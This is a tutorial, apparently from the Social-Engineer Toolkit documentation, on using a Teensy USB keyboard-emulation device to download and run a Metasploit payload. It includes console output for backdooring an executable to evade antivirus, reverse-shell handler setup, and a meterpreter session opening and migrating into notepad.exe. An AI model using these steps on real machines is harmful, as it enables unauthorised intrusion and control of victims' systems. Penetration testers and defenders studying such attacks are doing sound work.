Teensy USB HID Attack Vector
The Teensy USB HID Attack Vector is a remarkable combination of customized hardware and bypassing restrictions by keyboard emulation. Traditionally when you insert a DVD/CD or USB if autorun is disabled, your autorun.inf isn’t called and you can’t execute your code automatically. With the Teensy HID based device you can emulate a keyboard and mouse. When you insert the device it will be detected as a keyboard, and with the microprocessor and onboard flash memory storage you can send a very fast set of keystrokes to the machine and completely compromise it. You can order a Teensy device for around 17 dollars at http://www.prjc.com. Quickly after David Kennedy, Josh Kelley, and Adrian Crewshaw’s talk on the Teensy devices, a PS3 hack came out utilizing the Teensy devices and they are currently backordered during the time of writing this tutorial.
Let’s setup or Teensy device to do a WSCRIPT downloader of a Metasploit payload. What will occur here is that a small wscript file will be written out which will download an executable and execute it. This will be our Metasploit payload and is all handled through the Social-Engineer Toolkit.
Select from the menu: 1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7 Update the Metasploit Framework 8. Update the Social-Engineer Toolkit 9. Help, Credits, and About 10. Exit the Social-Engineer Toolkit Enter your choice: 6 Welcome to the Teensy HID Attack Vector. Special thanks to: IronGeek and WinFang The Teensy HID Attack Vector utilizes the teensy USB device to program the device to act as a keyboard. Teensy's have onboard storage and can allow for remote code execution on the physical system. Since the devices are registered as USB Keyboard's it will bypass any autorun disabled or endpoint protection on the system. You will need to purchase the Teensy USB device, it's roughly $22 dollars. This attack vector will auto generate the code needed in order to deploy the payload on the system for you. This attack vector will create the .pde files necessary to import into Arduino (the IDE used for programming the Teensy). The attack vectors range from Powershell based downloaders, wscript attacks, and other methods. For more information on specifications and good tutorials visit: http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html Select a payload to create the pde file to import into Arduino: 1. Powershell HTTP GET MSF Payload 2. WSCRIPT HTTP GET MSF Payload 3. Powershell based Reverse Shell 4. Return to the main menu. Enter your choice: 2 Do you want to create a payload and listener yes or no: yes What payload do you want to generate: Name: Description: 1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker. 2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker. 3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker. 4. Windows Bind Shell Execute payload and create an accepting port on remote system. 5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline 6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports 9. Import your own executable Specify a path for your own executable Enter choice (hit enter for default): Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best. 1. avoid_utf8_tolower (Normal) 2. shikata_ga_nai (Very Good) 3. alpha_mixed (Normal) 4. alpha_upper (Normal) 5. call4_dword_xor (Normal) 6. countdown (Normal) 7. fnstenv_mov (Normal) 8. jmp_call_additive (Normal) 9. nonalpha (Normal) 10. nonupper (Normal) 11. unicode_mixed (Normal) 12. unicode_upper (Normal) 13. alpha2 (Normal) 14. No Encoding (None) 15. Multi-Encoder (Excellent) 16. Backdoored Executable (BEST) Enter your choice (enter for default): [-] Enter the PORT of the listener (enter for default): [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... [-] Backdoor completed successfully. Payload is now hidden within a legit executable. [*] PDE file created. You can get it under 'reports/teensy.pde' [*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino Press enter to continue. [*] Launching MSF Listener... [*] This may take a few to load MSF... [-] *** [-] * WARNING: No database support: String User Disabled Database Support [-] *** ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 588 exploits - 300 auxiliary + -- --=[ 224 payloads - 27 encoders - 8 nops =[ svn r10268 updated today (2010.09.09) resource (src/program_junk/meta_config)> use exploit/multi/handler resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (src/program_junk/meta_config)> set LHOST 0.0.0.0 LHOST => 0.0.0.0 resource (src/program_junk/meta_config)> set LPORT 443 LPORT => 443 resource (src/program_junk/meta_config)> set ExitOnSession false ExitOnSession => false resource (src/program_junk/meta_config)> exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
Now that we have everything ready, SET exports a file called teensy.pde to the reports/ folder. Copy that reports folder to wherever you have Arduino installed. With this attack, follow the instructions at PRJC on how to upload your code to the Teensy board, its relatively simple you just need to install the Teensy Loader and the Teensy libraries. Once you do that you will have an IDE interface called Arduino. One of the MOST important aspects of this is to ensure you set your board to a Teensy USB Keyboard/Mouse.
Once you have this selected, drag your pde file into the Arduino interface. Arduino/Teensy supports Linux, OSX, and Windows. Insert your USB device into the computer and upload your code. This will program your device with the SET generated code. Below is uploading and the code.
Once the USB device is inserted on the victim machine, once finished you should be presented with a meterpreter shell.
[*] Sending stage (748544 bytes) to 172.16.32.131 [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:52:32 -0400 2010 [*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f' [*] Current server process: java.exe (824) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 3044 [*] New server process: notepad.exe (3044) msf exploit(ms09_002_memory_corruption) > cc : Social Engineer